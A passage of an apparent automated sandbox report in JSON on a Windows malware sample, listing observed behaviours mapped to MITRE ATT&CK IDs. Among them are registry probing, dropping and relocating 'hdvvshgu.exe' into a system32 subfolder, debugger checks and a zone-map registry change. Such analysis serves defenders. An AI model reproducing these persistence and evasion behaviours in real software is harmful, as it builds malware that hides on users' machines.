Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe.Local\\\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\5D8CBD78849BB4F0EEB309900286AAEF035E83974AB403526AF1AD3716A194BF.EXE.LOCAL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\hdvvshgu.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"hdvvshgu.exe.67B73BFE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"hdvvshgu.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hdvvshgu.exe]- [targetUID: 00000000-00004580]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hdvvshgu.exe\" to \"%WINDIR%\\system32\\tpxhoiko\\hdvvshgu.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00004152-00000105-676213 [PID: 4152]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004152-00000105-1273534 [PID: 4152]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004152-00000105-2781130 [PID: 4152]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004152-00000105-3068291 [PID: 4152]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004152-00000105-3614226 [PID: 4152]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004152-00000105-3868045 [PID: 4152]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004152-00000105-5177210 [PID: 4152]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00006128-00000105-121028 [PID: 6128]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00006128-00000105-867900 [PID: 6128]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F9B0000\n \"hdvvshgu.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F9B0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F9B0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00004152-00000105-7970037", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" queries volume information of \"C:\\\" at 00000000-00004580-0000010C-1577007\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" queries volume information of \"C:\\\" at 00000000-00004580-0000010C-1578469\n \"hdvvshgu.exe\" queries volume information of \"C:\\\" at 00000000-00005776-0000010C-1600231\n \"hdvvshgu.exe\" queries volume information of \"C:\\\" at 00000000-00005776-0000010C-1601794\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00006128-0000010C-65626\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00006128-0000010C-1313550\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00006128-0000010C-1797990\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00006128-0000010C-1800120", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000070b325003cfc5300145caa77435caa7708fd5300010000009401230001000000bcfb5300935cab774083b277d4a0aa770ff3dc7708fd5300010000000100000080ec2500000000008cfb5300bcfb530028fc530095e1a6774b0c2500feffffffd4a0aa771bbeba750000397600000000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5ca9774379ba75ffffffff0c0000004c62a9771f79ba75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e330000000000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006c0600000088ea3a77ecf91200b344636c88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b4000f6e1b024bcf51200616b400088000000f822410081a83a77ecf912000000900100eeb300000200000800000072bc5e00 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebf275283c2b0000b0fd7f9a5cab7700e0fd7fb0c96b0144b0fd7f00000000400000003f0000002500000000b0fd7fa4c96b01c15cab776082b2772500000000b0fd7f9a5cab7700e0fd7fc8c96b015789aa778083b2771317bb75d8ebf275 (UID: 00000000-00004580)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000a0dc2200d4f45600145caa77435caa77a0f5560001000000940120000100000054f45600935cab774083b277d4a0aa7782c2d977a0f55600010000000100000038e622000000000024f4560054f45600c0f4560095e1a6772e322500feffffffd4a0aa771bbeba750000397600000000 (UID: 00000000-00005332)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f0ae2900b8f64b00145caa77435caa7784f74b0001000000940127000100000038f64b00935cab774083b277d4a0aa7758c8c47784f74b000100000001000000d0242a000000000008f64b0038f64b00a4f64b0095e1a677983a2500feffffffd4a0aa771bbeba750000397600000000 (UID: 00000000-00005808)\n \"hdvvshgu.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5ca9774379ba75ffffffff0c0000004c62a9771f79ba75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2f0000000000 (UID: 00000000-00005776)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" queries volume information of \"C:\\\" at 00000000-00004580-0000010C-1577007\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" queries volume information of \"C:\\\" at 00000000-00004580-0000010C-1578469\n \"hdvvshgu.exe\" queries volume information of \"C:\\\" at 00000000-00005776-0000010C-1600231\n \"hdvvshgu.exe\" queries volume information of \"C:\\\" at 00000000-00005776-0000010C-1601794\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00006128-0000010C-65626\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00006128-0000010C-1313550\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00006128-0000010C-1797990\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00006128-0000010C-1800120", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004580)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called 